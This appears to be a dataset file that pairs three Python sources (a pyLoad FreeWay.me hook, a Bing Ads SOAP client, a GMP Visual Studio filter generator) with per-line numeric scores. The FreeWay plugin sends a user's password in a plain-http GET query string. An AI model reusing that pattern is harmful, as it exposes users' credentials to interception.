0.023809523809523808, 0.003952569169960474, 0.075, 0.0423728813559322, 0.04201680672268908, 0.041666666666666664, 0, 0.043478260869565216, 0.043010752688172046, 0.0425531914893617, 0, 0, 0, 0, 0.2, 0.0273972602739726, 0, 0.030303030303030304, 0, 0.2, 0, 
0.024096385542168676, 0.2, 0, 0.02857142857142857, 0.2, 0.020833333333333332, 0, 0, 0, 0, 0.03333333333333333, 0, 0.022222222222222223, 0.014925373134328358, 0, 0.08333333333333333, 0, 0, 0, 0, 0, 0.044444444444444446, 0.045454545454545456, 0, 0.041666666666666664, 0, 0.022222222222222223, 0.014925373134328358, 0, 0, 0, 0.2, 0, 0.2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.027777777777777776, 0, 0, 0.024096385542168676, 0.2, 0, 0.02857142857142857, 0, 0, 0.027777777777777776, 0, 0.02127659574468085, 0, 0, 0, 0, 0.08333333333333333, 0, 0, 0, 0.05, 0, 0, 0, 0.02631578947368421, 0.02127659574468085, 0, 0, 0, 0, 0.08333333333333333, 0, 0, 0.05, 0, 0, 0 ]
295
0.021046
false
# -*- coding: utf-8 -*- from module.plugins.internal.MultiHook import MultiHook class FreeWayMeHook(MultiHook): __name__ = "FreeWayMeHook" __type__ = "hook" __version__ = "0.18" __status__ = "testing" __config__ = [("pluginmode" , "all;listed;unlisted", "Use for plugins" , "all"), ("pluginlist" , "str" , "Plugin list (comma separated)", "" ), ("reload" , "bool" , "Reload plugin list" , True ), ("reloadinterval", "int" , "Reload interval in hours" , 12 )] __description__ = """FreeWay.me hook plugin""" __license__ = "GPLv3" __authors__ = [("Nicolas Giese", "james@free-way.me")] def get_hosters(self): user, info = self.account.select() hostis = self.load("http://www.free-way.bz/ajax/jd.php", get={'id' : 3, 'user': user, 'pass': info['login']['password']}).replace("\"", "") #@TODO: Revert to `https` in 0.4.10 return [x.strip() for x in hostis.split(",") if x.strip()]
[ "# -*- coding: utf-8 -*-\n", "\n", "from module.plugins.internal.MultiHook import MultiHook\n", "\n", "\n", "class FreeWayMeHook(MultiHook):\n", " __name__ = \"FreeWayMeHook\"\n", " __type__ = \"hook\"\n", " __version__ = \"0.18\"\n", " __status__ = \"testing\"\n", "\n", " __config__ = [(\"pluginmode\" , \"all;listed;unlisted\", \"Use for plugins\" , \"all\"),\n", " (\"pluginlist\" , \"str\" , \"Plugin list (comma separated)\", \"\" ),\n", " (\"reload\" , \"bool\" , \"Reload plugin list\" , True ),\n", " (\"reloadinterval\", \"int\" , \"Reload interval in hours\" , 12 )]\n", "\n", " __description__ = \"\"\"FreeWay.me hook plugin\"\"\"\n", " __license__ = \"GPLv3\"\n", " __authors__ = [(\"Nicolas Giese\", \"james@free-way.me\")]\n", "\n", "\n", " def get_hosters(self):\n", " user, info = self.account.select()\n", " hostis = self.load(\"http://www.free-way.bz/ajax/jd.php\",\n", " get={'id' : 3,\n", " 'user': user,\n", " 'pass': info['login']['password']}).replace(\"\\\"\", \"\") #@TODO: Revert to `https` in 0.4.10\n", " return [x.strip() for x in hostis.split(\",\") if x.strip()]\n" ]
[ 0, 0, 0, 0, 0, 0, 0.029411764705882353, 0.04, 0, 0.03571428571428571, 0, 0.0297029702970297, 0.039603960396039604, 0.04950495049504951, 0.039603960396039604, 0, 0, 0.03333333333333333, 0.015873015873015872, 0, 0, 0.037037037037037035, 0, 0, 0.023255813953488372, 0, 0.016260162601626018, 0 ]
28
0.013904
false
from suds.client import Client, Factory, WebFault, ObjectCache # noqa from .headerplugin import HeaderPlugin from .authorization import * from .service_info import SERVICE_INFO_DICT from .manifest import USER_AGENT from getpass import getuser from tempfile import gettempdir from os import path class ServiceClient: """ Provides an interface for calling the methods of the specified Bing Ads service.""" def __init__(self, service, version, authorization_data=None, environment='production', **suds_options): """ Initializes a new instance of this class. :param service: The service name. :type service: str :param authorization_data: (optional) The authorization data, if not provided, cannot call operations on service :type authorization_data: AuthorizationData or None :param environment: (optional) The environment name, can only be 'production' or 'sandbox', the default is 'production' :type environment: str :param version: to specify the service version :param suds_options: The suds options need to pass to suds client """ self._input_service = service self._input_environment = environment self._authorization_data = authorization_data self._refresh_oauth_tokens_automatically = True self._version = ServiceClient._format_version(version) # TODO This is a temp fix for set default suds temp folder with user info, suds development branch has already fixed it. 
if 'cache' not in suds_options: location = path.join(gettempdir(), 'suds', getuser()) suds_options['cache'] = ObjectCache(location, days=1) # set cachingpolicy to 1 to reuse WSDL cache files, otherwise will only reuse XML files if 'cachingpolicy' not in suds_options: suds_options['cachingpolicy'] = 1 self._options = suds_options self._service = ServiceClient._format_service(service) self._environment = ServiceClient._format_environment(environment) self.hp=HeaderPlugin() suds_options['plugins'] = [self.hp] self._soap_client = Client(self.service_url, **suds_options) def __getattr__(self, name): # Set authorization data and options before every service call. self.set_options(**self._options) return _ServiceCall(self, name) def get_response_header(self): return self.hp.get_response_header() def set_options(self, **kwargs): """ Set suds options, these options will be passed to suds. :param kwargs: suds options. :rtype: None """ self._options = kwargs kwargs = ServiceClient._ensemble_header(self.authorization_data, **self._options) self._soap_client.set_options(**kwargs) @property def authorization_data(self): """ Represents a user who intends to access the corresponding customer and account. :rtype: AuthorizationData """ return self._authorization_data @property def soap_client(self): """ The internal suds soap client. :rtype: Client """ return self._soap_client @property def factory(self): """ The internal suds soap client factory. :rtype: Factory """ return self.soap_client.factory @property def service_url(self): """ The wsdl url of service based on the specific service and environment. :rtype: str """ key = (self._service, self._environment) service_info_dict = ServiceClient._get_service_info_dict(self._version) if key not in service_info_dict: raise ValueError(str.format('Cannot find version: [v{0}] service: [{1}] under environment: [{2}]. 
\ Please notice that campaign management, bulk, ad intelligence and optimizer services were deprecated in v9', self._version, self._input_service, self._input_environment)) return service_info_dict[(self._service, self._environment)].url @property def refresh_oauth_tokens_automatically(self): """ A value indicating whether OAuth access and refresh tokens should be refreshed automatically upon access token expiration. :rtype: bool """ return self._refresh_oauth_tokens_automatically @refresh_oauth_tokens_automatically.setter def refresh_oauth_tokens_automatically(self, value): self._refresh_oauth_tokens_automatically = value @staticmethod def _ensemble_header(authorization_data, **kwargs): """ Ensemble the request header send to API services. :param authorization_data: the authorization data :type authorization_data: AuthorizationData :return: the ensemble request header :rtype: dict """ if 'soapheaders' in kwargs: raise Exception('cannot pass in kwargs contains soapheaders') if authorization_data is None: return kwargs headers = { 'DeveloperToken': authorization_data.developer_token, 'CustomerId': str(authorization_data.customer_id), 'CustomerAccountId': str(authorization_data.account_id), } authorization_data.authentication.enrich_headers(headers) http_headers = { 'User-Agent': USER_AGENT, } kwargs['soapheaders'] = headers kwargs['headers'] = http_headers return kwargs @staticmethod def _is_expired_token_exception(ex): if isinstance(ex, WebFault): if hasattr(ex.fault, 'detail') \ and hasattr(ex.fault.detail, 'AdApiFaultDetail') \ and hasattr(ex.fault.detail.AdApiFaultDetail, 'Errors') \ and hasattr(ex.fault.detail.AdApiFaultDetail.Errors, 'AdApiError'): ad_api_errors = ex.fault.detail.AdApiFaultDetail.Errors.AdApiError if type(ad_api_errors) == list: for ad_api_error in ad_api_errors: if ad_api_error.Code == '109': return True else: if ad_api_errors.Code == '109': return True return False @staticmethod def _format_service(service): """ Regularize the service name. 
The regularized service name contains only lower character without spaces. :param service: the service name :type service: str :return: the regularized service name :rtype: str """ service = service.strip().lower() service = service.replace('_', '') service = service.replace('-', '') service = service.replace(' ', '') if service.endswith('service'): service = service.replace('service', '') # remove postfix "service" if any return service @staticmethod def _format_version(version): """ format the version to a int value. :param version: :return: int version """ if version == 'v12' or version == 12: return 12 raise ValueError(str.format('version error: [{0}] is not supported.', version)) @staticmethod def _get_service_info_dict(version): """ Get the service information dict by version :param version: :return: the service info dict """ return SERVICE_INFO_DICT[version] @staticmethod def _format_environment(environment): """ Regularize the environment name. the regularized version contains only lower character without spaces. :param environment: the environment name :type environment: str :return: the regularized environment name :rtype: str """ environment = environment.strip().lower() return environment class _ServiceCall: """ This class wrapped method invocation on ServiceClient, add more logic to suds client call.""" def __init__(self, service_client, name): """ Initializes a new instance of this class. 
:param service_client: the service client need to be wrapped :type service_client: ServiceClient :param name: the method name :type name: str :return: the instance of this class :rtype: _ServiceCall """ self._service_client = service_client self._name = name def __call__(self, *args, **kwargs): need_to_refresh_token = False while True: if need_to_refresh_token: authentication = self.service_client.authorization_data.authentication if not isinstance(authentication, OAuthWithAuthorizationCode): raise ValueError( 'The type: {0} of authorization_data cannot refresh token automatically.', type(authentication).__name__ ) refresh_token = authentication.oauth_tokens.refresh_token authentication.request_oauth_tokens_by_refresh_token(refresh_token) self.service_client.set_options(**self.service_client._options) try: response = self.service_client.soap_client.service.__getattr__(self.name)(*args, **kwargs) return response except Exception as ex: if need_to_refresh_token is False \ and self.service_client.refresh_oauth_tokens_automatically \ and self.service_client._is_expired_token_exception(ex): need_to_refresh_token = True else: raise ex @property def service_client(self): """ The wrapped service client. :rtype: ServiceClient """ return self._service_client @property def name(self): """ The method name. 
:rtype: str """ return self._name import pkg_resources import types from suds.sudsobject import Property from suds.sax.text import Text _CAMPAIGN_MANAGEMENT_SERVICE_V12 = Client( 'file:///' + pkg_resources.resource_filename('bingads', 'v12/proxies/campaign_management_service.xml')) _CAMPAIGN_OBJECT_FACTORY_V12 = _CAMPAIGN_MANAGEMENT_SERVICE_V12.factory _CAMPAIGN_OBJECT_FACTORY_V12.object_cache = {} _CAMPAIGN_OBJECT_FACTORY_V12.create_without_cache = _CAMPAIGN_OBJECT_FACTORY_V12.create def _suds_objects_deepcopy(origin): if origin is None: return None origin_type = type(origin) if origin_type == Text: return origin if origin_type == list: new = [] for item in origin: new.append(_suds_objects_deepcopy(item)) return new if isinstance(origin, Property): new = origin_type(None) new.__metadata__ = origin.__metadata__ return new new = origin_type() for name in origin.__keylist__: setattr(new, name, _suds_objects_deepcopy(getattr(origin, name))) new.__metadata__ = origin.__metadata__ return new def _create_with_cache(self, name): if name not in self.object_cache: self.object_cache[name] = self.create_without_cache(name) obj = self.object_cache[name] copied_obj = _suds_objects_deepcopy(obj) return copied_obj
[ "from suds.client import Client, Factory, WebFault, ObjectCache # noqa\n", "\n", "from .headerplugin import HeaderPlugin\n", "from .authorization import *\n", "from .service_info import SERVICE_INFO_DICT\n", "from .manifest import USER_AGENT\n", "from getpass import getuser\n", "from tempfile import gettempdir\n", "from os import path\n", "\n", "\n", "class ServiceClient:\n", " \"\"\" Provides an interface for calling the methods of the specified Bing Ads service.\"\"\"\n", "\n", " def __init__(self, service, version, authorization_data=None, environment='production', **suds_options):\n", " \"\"\" Initializes a new instance of this class.\n", "\n", " :param service: The service name.\n", " :type service: str\n", " :param authorization_data: (optional) The authorization data, if not provided, cannot call operations on service\n", " :type authorization_data: AuthorizationData or None\n", " :param environment: (optional) The environment name, can only be 'production' or 'sandbox', the default is 'production'\n", " :type environment: str\n", " :param version: to specify the service version\n", " :param suds_options: The suds options need to pass to suds client\n", " \"\"\"\n", "\n", " self._input_service = service\n", " self._input_environment = environment\n", " self._authorization_data = authorization_data\n", " self._refresh_oauth_tokens_automatically = True\n", " self._version = ServiceClient._format_version(version)\n", "\n", " # TODO This is a temp fix for set default suds temp folder with user info, suds development branch has already fixed it.\n", " if 'cache' not in suds_options:\n", " location = path.join(gettempdir(), 'suds', getuser())\n", " suds_options['cache'] = ObjectCache(location, days=1)\n", " # set cachingpolicy to 1 to reuse WSDL cache files, otherwise will only reuse XML files\n", " if 'cachingpolicy' not in suds_options:\n", " suds_options['cachingpolicy'] = 1\n", " self._options = suds_options\n", "\n", " self._service = 
ServiceClient._format_service(service)\n", " self._environment = ServiceClient._format_environment(environment)\n", "\n", " self.hp=HeaderPlugin()\n", " suds_options['plugins'] = [self.hp]\n", " self._soap_client = Client(self.service_url, **suds_options)\n", "\n", " def __getattr__(self, name):\n", " # Set authorization data and options before every service call.\n", "\n", " self.set_options(**self._options)\n", " return _ServiceCall(self, name)\n", " \n", " def get_response_header(self):\n", " return self.hp.get_response_header()\n", "\n", " def set_options(self, **kwargs):\n", " \"\"\" Set suds options, these options will be passed to suds.\n", "\n", " :param kwargs: suds options.\n", " :rtype: None\n", " \"\"\"\n", "\n", " self._options = kwargs\n", " kwargs = ServiceClient._ensemble_header(self.authorization_data, **self._options)\n", " self._soap_client.set_options(**kwargs)\n", "\n", " @property\n", " def authorization_data(self):\n", " \"\"\" Represents a user who intends to access the corresponding customer and account.\n", "\n", " :rtype: AuthorizationData\n", " \"\"\"\n", "\n", " return self._authorization_data\n", "\n", " @property\n", " def soap_client(self):\n", " \"\"\" The internal suds soap client.\n", "\n", " :rtype: Client\n", " \"\"\"\n", "\n", " return self._soap_client\n", "\n", " @property\n", " def factory(self):\n", " \"\"\" The internal suds soap client factory.\n", "\n", " :rtype: Factory\n", " \"\"\"\n", "\n", " return self.soap_client.factory\n", "\n", " @property\n", " def service_url(self):\n", " \"\"\" The wsdl url of service based on the specific service and environment.\n", "\n", " :rtype: str\n", " \"\"\"\n", "\n", " key = (self._service, self._environment)\n", " service_info_dict = ServiceClient._get_service_info_dict(self._version)\n", " if key not in service_info_dict:\n", " raise ValueError(str.format('Cannot find version: [v{0}] service: [{1}] under environment: [{2}]. 
\\\n", " Please notice that campaign management, bulk, ad intelligence and optimizer services were deprecated in v9',\n", " self._version, self._input_service, self._input_environment))\n", " return service_info_dict[(self._service, self._environment)].url\n", "\n", "\n", " @property\n", " def refresh_oauth_tokens_automatically(self):\n", " \"\"\" A value indicating whether OAuth access and refresh tokens should be refreshed automatically upon access token expiration.\n", "\n", " :rtype: bool\n", " \"\"\"\n", " return self._refresh_oauth_tokens_automatically\n", "\n", " @refresh_oauth_tokens_automatically.setter\n", " def refresh_oauth_tokens_automatically(self, value):\n", " self._refresh_oauth_tokens_automatically = value\n", "\n", " @staticmethod\n", " def _ensemble_header(authorization_data, **kwargs):\n", " \"\"\" Ensemble the request header send to API services.\n", "\n", " :param authorization_data: the authorization data\n", " :type authorization_data: AuthorizationData\n", " :return: the ensemble request header\n", " :rtype: dict\n", " \"\"\"\n", "\n", " if 'soapheaders' in kwargs:\n", " raise Exception('cannot pass in kwargs contains soapheaders')\n", " if authorization_data is None:\n", " return kwargs\n", " headers = {\n", " 'DeveloperToken': authorization_data.developer_token,\n", " 'CustomerId': str(authorization_data.customer_id),\n", " 'CustomerAccountId': str(authorization_data.account_id),\n", " }\n", " authorization_data.authentication.enrich_headers(headers)\n", "\n", " http_headers = {\n", " 'User-Agent': USER_AGENT,\n", " }\n", "\n", " kwargs['soapheaders'] = headers\n", " kwargs['headers'] = http_headers\n", "\n", " return kwargs\n", "\n", " @staticmethod\n", " def _is_expired_token_exception(ex):\n", " if isinstance(ex, WebFault):\n", " if hasattr(ex.fault, 'detail') \\\n", " and hasattr(ex.fault.detail, 'AdApiFaultDetail') \\\n", " and hasattr(ex.fault.detail.AdApiFaultDetail, 'Errors') \\\n", " and 
hasattr(ex.fault.detail.AdApiFaultDetail.Errors, 'AdApiError'):\n", " ad_api_errors = ex.fault.detail.AdApiFaultDetail.Errors.AdApiError\n", " if type(ad_api_errors) == list:\n", " for ad_api_error in ad_api_errors:\n", " if ad_api_error.Code == '109':\n", " return True\n", " else:\n", " if ad_api_errors.Code == '109':\n", " return True\n", " return False\n", "\n", " @staticmethod\n", " def _format_service(service):\n", " \"\"\" Regularize the service name.\n", "\n", " The regularized service name contains only lower character without spaces.\n", "\n", " :param service: the service name\n", " :type service: str\n", " :return: the regularized service name\n", " :rtype: str\n", " \"\"\"\n", "\n", " service = service.strip().lower()\n", " service = service.replace('_', '')\n", " service = service.replace('-', '')\n", " service = service.replace(' ', '')\n", " if service.endswith('service'):\n", " service = service.replace('service', '') # remove postfix \"service\" if any\n", " return service\n", "\n", " @staticmethod\n", " def _format_version(version):\n", " \"\"\"\n", " format the version to a int value.\n", " :param version:\n", " :return: int version\n", " \"\"\"\n", " if version == 'v12' or version == 12:\n", " return 12\n", " raise ValueError(str.format('version error: [{0}] is not supported.', version))\n", "\n", "\n", " @staticmethod\n", " def _get_service_info_dict(version):\n", " \"\"\"\n", " Get the service information dict by version\n", " :param version:\n", " :return: the service info dict\n", " \"\"\"\n", " return SERVICE_INFO_DICT[version]\n", "\n", " @staticmethod\n", " def _format_environment(environment):\n", " \"\"\" Regularize the environment name.\n", "\n", " the regularized version contains only lower character without spaces.\n", "\n", " :param environment: the environment name\n", " :type environment: str\n", " :return: the regularized environment name\n", " :rtype: str\n", " \"\"\"\n", "\n", " environment = environment.strip().lower()\n", " 
return environment\n", "\n", "\n", "class _ServiceCall:\n", " \"\"\" This class wrapped method invocation on ServiceClient, add more logic to suds client call.\"\"\"\n", "\n", " def __init__(self, service_client, name):\n", " \"\"\" Initializes a new instance of this class.\n", "\n", " :param service_client: the service client need to be wrapped\n", " :type service_client: ServiceClient\n", " :param name: the method name\n", " :type name: str\n", " :return: the instance of this class\n", " :rtype: _ServiceCall\n", " \"\"\"\n", "\n", " self._service_client = service_client\n", " self._name = name\n", "\n", " def __call__(self, *args, **kwargs):\n", " need_to_refresh_token = False\n", " while True:\n", " if need_to_refresh_token:\n", " authentication = self.service_client.authorization_data.authentication\n", " if not isinstance(authentication, OAuthWithAuthorizationCode):\n", " raise ValueError(\n", " 'The type: {0} of authorization_data cannot refresh token automatically.',\n", " type(authentication).__name__\n", " )\n", " refresh_token = authentication.oauth_tokens.refresh_token\n", " authentication.request_oauth_tokens_by_refresh_token(refresh_token)\n", " self.service_client.set_options(**self.service_client._options)\n", " try:\n", " response = self.service_client.soap_client.service.__getattr__(self.name)(*args, **kwargs)\n", " return response\n", " except Exception as ex:\n", " if need_to_refresh_token is False \\\n", " and self.service_client.refresh_oauth_tokens_automatically \\\n", " and self.service_client._is_expired_token_exception(ex):\n", " need_to_refresh_token = True\n", " else:\n", " raise ex\n", "\n", " @property\n", " def service_client(self):\n", " \"\"\" The wrapped service client.\n", "\n", " :rtype: ServiceClient\n", " \"\"\"\n", "\n", " return self._service_client\n", "\n", " @property\n", " def name(self):\n", " \"\"\" The method name.\n", "\n", " :rtype: str\n", " \"\"\"\n", "\n", " return self._name\n", "\n", "\n", "import 
pkg_resources\n", "import types\n", "from suds.sudsobject import Property\n", "from suds.sax.text import Text\n", "\n", "\n", "_CAMPAIGN_MANAGEMENT_SERVICE_V12 = Client(\n", " 'file:///' + pkg_resources.resource_filename('bingads', 'v12/proxies/campaign_management_service.xml'))\n", "_CAMPAIGN_OBJECT_FACTORY_V12 = _CAMPAIGN_MANAGEMENT_SERVICE_V12.factory\n", "_CAMPAIGN_OBJECT_FACTORY_V12.object_cache = {}\n", "_CAMPAIGN_OBJECT_FACTORY_V12.create_without_cache = _CAMPAIGN_OBJECT_FACTORY_V12.create\n", "\n", "\n", "def _suds_objects_deepcopy(origin):\n", " if origin is None:\n", " return None\n", " origin_type = type(origin)\n", " if origin_type == Text:\n", " return origin\n", " if origin_type == list:\n", " new = []\n", " for item in origin:\n", " new.append(_suds_objects_deepcopy(item))\n", " return new\n", " if isinstance(origin, Property):\n", " new = origin_type(None)\n", " new.__metadata__ = origin.__metadata__\n", " return new\n", " new = origin_type()\n", " for name in origin.__keylist__:\n", " setattr(new, name, _suds_objects_deepcopy(getattr(origin, name)))\n", " new.__metadata__ = origin.__metadata__\n", " return new\n", "\n", "\n", "def _create_with_cache(self, name):\n", " if name not in self.object_cache:\n", " self.object_cache[name] = self.create_without_cache(name)\n", " obj = self.object_cache[name]\n", " copied_obj = _suds_objects_deepcopy(obj)\n", " return copied_obj\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.010869565217391304, 0, 0.009174311926605505, 0, 0, 0, 0, 0.008264462809917356, 0, 0.0078125, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.007751937984496124, 0, 0, 0, 0.010416666666666666, 0, 0, 0, 0, 0, 0, 0, 0.03225806451612903, 0, 0, 0, 0, 0, 0, 0, 0, 0.2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011111111111111112, 0, 0, 0, 0, 0.010869565217391304, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012048192771084338, 0, 0, 0, 0, 0, 0, 0, 0.008928571428571428, 0.008264462809917356, 0.00980392156862745, 0, 0, 0, 0.07142857142857142, 0, 0.007407407407407408, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011363636363636364, 0.012048192771084338, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012048192771084338, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011363636363636364, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011363636363636364, 0, 0, 0.05555555555555555, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.00980392156862745, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011494252873563218, 0, 0, 0.010101010101010102, 0, 0, 0, 0.011904761904761904, 0, 0, 0.009345794392523364, 0, 0, 0, 0.011764705882352941, 0.012345679012345678, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.047619047619047616, 0.07692307692307693, 0.02702702702702703, 0.03225806451612903, 0, 0, 0, 0.009259259259259259, 0, 0, 0.011363636363636364, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
329
0.002497
false
# generate Visual Studio IDE Filter from os import makedirs from os.path import dirname, normpath, join, split, relpath from errno import EEXIST def filter_folders(cf_list, af_list, outf): f1 = r''' <ItemGroup> <Filter Include="Header Files" /> <Filter Include="Source Files" /> ''' f2 = r''' <Filter Include="Source Files\{0:s}" /> ''' f3 = r''' </ItemGroup> ''' c_dirs = set(i[2] for i in cf_list) a_dirs = set(i[2] for i in af_list) if a_dirs: c_dirs |= set((r'mpn\yasm',)) outf.write(f1) for d in sorted(c_dirs): if d: t = d if d != r'mpn\generic' else r'mpn' outf.write(f2.format(t)) outf.write(f3) def filter_headers(hdr_list, relp, outf): f1 = r''' <ItemGroup> ''' f2 = r''' <ClInclude Include="{}{}"> <Filter>Header Files</Filter> </ClInclude> ''' f3 = r''' </ItemGroup> ''' outf.write(f1) for h in hdr_list: outf.write(f2.format(relp, h)) outf.write(f3) def filter_csrc(cf_list, relp, outf): f1 = r''' <ItemGroup> ''' f2 = r''' <ClCompile Include="{}{}"> <Filter>Source Files</Filter> </ClCompile> ''' f3 = r''' <ClCompile Include="{}{}\{}"> <Filter>Source Files\{}</Filter> </ClCompile> ''' f4 = r''' </ItemGroup> ''' outf.write(f1) for i in cf_list: if not i[2]: outf.write(f2.format(relp, i[0] + i[1])) else: t = 'mpn' if i[2].endswith('generic') else i[2] outf.write(f3.format(relp, i[2], i[0] + i[1], t)) outf.write(f4) def filter_asrc(af_list, relp, outf): f1 = r''' <ItemGroup> ''' f2 = r''' <YASM Include="{0:s}{2:s}\{1:s}"> <Filter>Source Files\mpn\yasm</Filter> </YASM> ''' f3 = r''' </ItemGroup> ''' outf.write(f1) for i in af_list: outf.write(f2.format(relp, i[0] + i[1], i[2], i[2])) outf.write(f3) def gen_filter(path, root_dir, hf_list, cf_list, af_list, tools_ver): f1 = r'''<?xml version="1.0" encoding="utf-8"?> <Project ToolsVersion="{0}" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> '''.format(tools_ver) f2 = r''' <ItemGroup> <None Include="..\..\gmp-h.in" /> </ItemGroup> </Project> ''' relp = split(relpath(root_dir, path))[0] + '\\' try: 
makedirs(split(path)[0]) except IOError as e: if e.errno != EEXIST: raise else: pass with open(path, 'w') as outf: outf.write(f1) filter_folders(cf_list, af_list, outf) if hf_list: filter_headers(hf_list, relp, outf) filter_csrc(cf_list, relp, outf) if af_list: filter_asrc(af_list, relp, outf) outf.write(f2)
[ "# generate Visual Studio IDE Filter\n", "\n", "from os import makedirs\n", "from os.path import dirname, normpath, join, split, relpath\n", "from errno import EEXIST\n", "\n", "def filter_folders(cf_list, af_list, outf):\n", "\n", " f1 = r''' <ItemGroup>\n", " <Filter Include=\"Header Files\" />\n", " <Filter Include=\"Source Files\" />\n", "'''\n", " f2 = r''' <Filter Include=\"Source Files\\{0:s}\" />\n", "'''\n", " f3 = r''' </ItemGroup>\n", "'''\n", " c_dirs = set(i[2] for i in cf_list)\n", " a_dirs = set(i[2] for i in af_list)\n", " if a_dirs:\n", " c_dirs |= set((r'mpn\\yasm',))\n", " outf.write(f1)\n", " for d in sorted(c_dirs):\n", " if d:\n", " t = d if d != r'mpn\\generic' else r'mpn'\n", " outf.write(f2.format(t))\n", " outf.write(f3)\n", "\n", "def filter_headers(hdr_list, relp, outf):\n", "\n", " f1 = r''' <ItemGroup>\n", "'''\n", " f2 = r''' <ClInclude Include=\"{}{}\">\n", " <Filter>Header Files</Filter>\n", " </ClInclude>\n", "'''\n", " f3 = r''' </ItemGroup>\n", "'''\n", " outf.write(f1)\n", " for h in hdr_list:\n", " outf.write(f2.format(relp, h))\n", " outf.write(f3)\n", "\n", "def filter_csrc(cf_list, relp, outf):\n", "\n", " f1 = r''' <ItemGroup>\n", "'''\n", " f2 = r''' <ClCompile Include=\"{}{}\">\n", " <Filter>Source Files</Filter>\n", " </ClCompile>\n", "'''\n", " f3 = r''' <ClCompile Include=\"{}{}\\{}\">\n", " <Filter>Source Files\\{}</Filter>\n", " </ClCompile>\n", "'''\n", " f4 = r''' </ItemGroup>\n", "'''\n", " outf.write(f1)\n", " for i in cf_list:\n", " if not i[2]:\n", " outf.write(f2.format(relp, i[0] + i[1]))\n", " else:\n", " t = 'mpn' if i[2].endswith('generic') else i[2]\n", " outf.write(f3.format(relp, i[2], i[0] + i[1], t))\n", " outf.write(f4)\n", "\n", "def filter_asrc(af_list, relp, outf):\n", "\n", " f1 = r''' <ItemGroup>\n", "'''\n", " f2 = r''' <YASM Include=\"{0:s}{2:s}\\{1:s}\">\n", " <Filter>Source Files\\mpn\\yasm</Filter>\n", " </YASM>\n", "'''\n", " f3 = r''' </ItemGroup>\n", "'''\n", " outf.write(f1)\n", " for 
i in af_list:\n", " outf.write(f2.format(relp, i[0] + i[1], i[2], i[2]))\n", " outf.write(f3)\n", "\n", "def gen_filter(path, root_dir, hf_list, cf_list, af_list, tools_ver):\n", "\n", " f1 = r'''<?xml version=\"1.0\" encoding=\"utf-8\"?>\n", "<Project ToolsVersion=\"{0}\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n", "'''.format(tools_ver)\n", "\n", " f2 = r''' <ItemGroup>\n", " <None Include=\"..\\..\\gmp-h.in\" />\n", " </ItemGroup>\n", "</Project>\n", "'''\n", "\n", " relp = split(relpath(root_dir, path))[0] + '\\\\'\n", " try:\n", " makedirs(split(path)[0])\n", " except IOError as e:\n", " if e.errno != EEXIST:\n", " raise\n", " else:\n", " pass\n", "\n", " with open(path, 'w') as outf:\n", "\n", " outf.write(f1)\n", " filter_folders(cf_list, af_list, outf)\n", " if hf_list:\n", " filter_headers(hf_list, relp, outf)\n", " filter_csrc(cf_list, relp, outf)\n", " if af_list:\n", " filter_asrc(af_list, relp, outf)\n", " outf.write(f2)\n" ]
[ 0, 0, 0, 0, 0, 0, 0.022727272727272728, 0, 0.04, 0, 0, 0, 0.01818181818181818, 0, 0.038461538461538464, 0, 0.02631578947368421, 0.02631578947368421, 0.07692307692307693, 0, 0.058823529411764705, 0.037037037037037035, 0, 0.02127659574468085, 0.03225806451612903, 0.058823529411764705, 0, 0.023809523809523808, 0, 0.04, 0, 0.023809523809523808, 0, 0, 0, 0.038461538461538464, 0, 0.058823529411764705, 0.047619047619047616, 0, 0.058823529411764705, 0, 0.02631578947368421, 0, 0.04, 0, 0.023809523809523808, 0, 0, 0, 0.022222222222222223, 0, 0, 0, 0.038461538461538464, 0, 0.058823529411764705, 0.05, 0, 0.02127659574468085, 0, 0.018518518518518517, 0.017857142857142856, 0.058823529411764705, 0, 0.02631578947368421, 0, 0.04, 0, 0.02040816326530612, 0, 0, 0, 0.038461538461538464, 0, 0.058823529411764705, 0.05, 0, 0.058823529411764705, 0, 0.014285714285714285, 0, 0.02, 0.011235955056179775, 0, 0, 0.04, 0, 0, 0, 0, 0, 0.02, 0.14285714285714285, 0, 0.043478260869565216, 0, 0.08333333333333333, 0, 0.09090909090909091, 0, 0.03125, 0, 0, 0, 0, 0.023809523809523808, 0, 0, 0.02564102564102564, 0 ]
111
0.017696
false
